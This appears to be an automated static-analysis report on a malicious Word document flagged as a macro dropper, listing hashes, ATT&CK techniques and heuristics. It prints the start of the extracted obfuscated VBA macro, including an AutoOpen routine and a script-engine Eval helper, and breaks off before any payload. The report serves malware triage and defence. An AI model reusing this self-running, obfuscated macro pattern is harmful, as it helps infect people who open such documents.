Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 07bd80eff6b8453b…

MALICIOUS

Office (OLE)

Size: 89.5 KB
Created: 2016-09-05 22:43:00
Authoring application: Microsoft Office Word
First seen: 2019-06-27
MD5: 3bf6c0a33440f1fca60a44551db66f1b
SHA-1: 518a7f90bfb8dbdacca95ce93434692fc4c2ed40
SHA-256: 07bd80eff6b8453bcbc4c8c388861c7568e72548cc16f94792a0c8dd70cf6570
Risk score: 222

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine, so the macro runs automatically when the document is opened. The macro uses the CreateObject function, a common technique for instantiating COM objects that can execute arbitrary code. The ClamAV signature 'Doc.Dropper.Agent-6460031-0' further supports classifying it as a dropper. The macro's likely intent is to download and execute a second-stage payload.

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6460031-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-6460031-0
  • VBA macros detected [medium, 3 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • CreateObject call [high] (OLE_VBA_CREATEOBJ)
    CreateObject call
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of the legacy Word macro execution surface; by itself it is not an attribution to a downloader or to a parser CVE.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 15534 bytes
SHA-256: 2a925526c0460a6559e16038bde784a948ee0ac4ce642c06c5d95efe32dec239
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub ggunjeqemt(znurivg, vapvaclizy0)
znurivg.Language = vapvaclizy0
End Sub
Sub tatescod(obabhal, qikifretsy9)
obabhal.Eval qikifretsy9
'roughness underpricing glorious london evacuee patois
End Sub
Sub AutoOpen()
Dim ipetnitec
Dim pojune
Dim zbyprut, unvibec2, pumywku3, defnacnu, ifhaxkafwi6, dinhazjoc0, emifjehb, exjiha, enodqacq9, kamexk, ypziwjond8, fjejbyzxopxu0, uzybogrymb, mpupucjy9, oranru, ofnetza4
Dim fjopgysvyw4
Dim mdojcopatd8
'squash abysses predilection minds unlabelled wiles interviewer
Dim vgobqahy, vevuwusdy, rehyty, muzvozig3, idynniq8, uslurwuff7, upixxyfcod4, joqtyf, kpezpewqyf7, ebohve
Dim ircanep, icxeragvob5, jbuwozqel, ukcivdykyg0, stamiszake1, efqitza, anzasim3, efuddon, dmohann, xopilse8
Dim qgigfuld
Dim fakvuzdajba, anybvi8, ewpisutw, kakavce4, acunge0, uwgesisab9, syxhekm8, yqitubi, qdottos, anewzehe, xpilqug, lbyfivgy
Dim ydbotgynsoxr4, otxidgidk, ktakyls1, ohbytty, ejzupxewa8, omwimowni1, udimvuz8, vrubluvlabp8, xehdakukky, lurug0, knipebk, dwachomeqd0, tzorpihedb7
Dim owbujevoq
Dim enopa
'intimidated captures doctoral mountaineering cheep vetoing armless
Dim mullacyt4
Dim yzzunipe
Dim nrosimop6, unviwu2, ygbepvowig1, fufyfgu0, acxyxafd, dkicenolu0, ejriho, bosigxaly, faghugudu, yzpohehi9, abvidpe8, ttajkyno, azpogide7, tetyh4, ycuzalr8, uhlyholu8
Dim uzewqyv
Dim qosan, lzusfysuhme7, zkiniwc, cwufgona, okogixqe5, jowalhuq1, wkadpenv9, egjajfany, evynvu, xkatifrej8, zyzbuq2, rqufolmu, mwitsirqyhh3, etukruzc, yvfoxivy
Dim ufbodob5
'luxuriously scripts rue foreland dipsomaniac multifunction drained sink
Dim xxawaqpawe
Dim fcavyg7
Dim vzuvfupx4, ladnultan, oqyto, ifipytavp, uftucenqi1, umzizzizga5, linonuj, gmammygveta5, vcymsuzmovlu, ubxibfo
Dim zenlyqc4
Dim upaco, arazojtak9, nirsisosg0, emhugi7, omyjonxucm2, lmirahu1, vuzxiloki, ebhiprodk9, yniwi, myrjifkoge7
'calumniate consideration snagged asperity elitism discontinuous fops climber
Dim bicyd
Dim zosyc0
Dim esejto4, heclah1, iracpy0, jlazomhaze0, nzunxot, nlinzyqv, harbeqaz, tvijjowi, zsaseti0, ulexguhfytp4
Dim mulvywe
Dim frivyfy8, eqlimpivno, ylwejo, achuzo, ukwipkezle5, qmymuc, qufepkovv5, syjoj, cnudhym, mufteqre, yqnare, zlixcunn
Dim cubpymmuj, yjazpu0, lexfupxazo, yrygfo0, cxupexd, ydylilpohd4, xywartysj, bcobofy, sewfenacjy3, atnacoqa, mdalwudypa0, atafu3, jaxluk, sfyhcevc, bifvuc6
'jurisprudence denuded ledger stunting insertions
Dim ywono2, exhoku, ofsyca4, ugfetbok7, nebhuxn0, nvysbyboba2, ukyxawepr, secox2, fabbytnori9, olzimban8, ektukecy, reparxu, xyzcebetba8
Dim dewsyk
Dim lzactebevdy
Dim rehwofg, jvinihsygy8, uhjuwvann, bazax7, dwicbesj2, linpeg6, aqhygtenymn8, tnansydte8, klamajihh8, ajuby3, zufitoja, bwazcybizz
Dim erwaqlavre, umydpapvi0, ridpinx6, imdogagr, kwowrohl, sqenovar6, tvujhunzon, neqryxy7, leqxozca1, mytjyda6
'shreds tossing chain abhor tshirt optician percussively microelectronic
Dim ljixdyv7, tofsuve, komownov6, kquvekew0, esjictik8, elgirma, optezore, ivity9, oqdoxog, eqzivkojvo7, yfsywuz0
Dim inoqagg
Dim aqesizi, bobzokfobci, pisyhcuhu3, iwvacymmi, byddybinby, gawlozf2, ifcecosow8, gxojnetqoz, ijqakxogz
Dim fqyxsijvivx1, ajyjah0, xtexudodo, lhucdyh, dmadipkap, yfvydbawx0, osyqmyg, bennisvikha7, amoxnabkuj, akyqbevho
Dim axiwxu0
'beady reduces topography ploughers neutraliser irks raiding coloure
Dim trymogtaby, ytezurdad8, yjpidiqvu, estivsuxni, rxohnogefa, sbugzujv, givaduqba5, ltediwm, yforcawyv6, bjoncywm5, apocop2, fbipmezveqda, wmexmypceb0, ilkoxaqno, ubupdy
Dim qgohhylwopd
Dim itdyvvigqovc
Dim aqifpohhot
Dim fgyhyh
Dim ixumxa9
Dim umsanco
Dim unihenge2
'undertaking disallows controller compiler font gust taped nicety suburbanites
Dim fnefceviqd, qxopowe7, kcybfop, gowhempe, urawqyvz, notu, ohrele1, uktalpyx2, yxodlevr, esxyvbyrbo, osmubm9, q
... (truncated)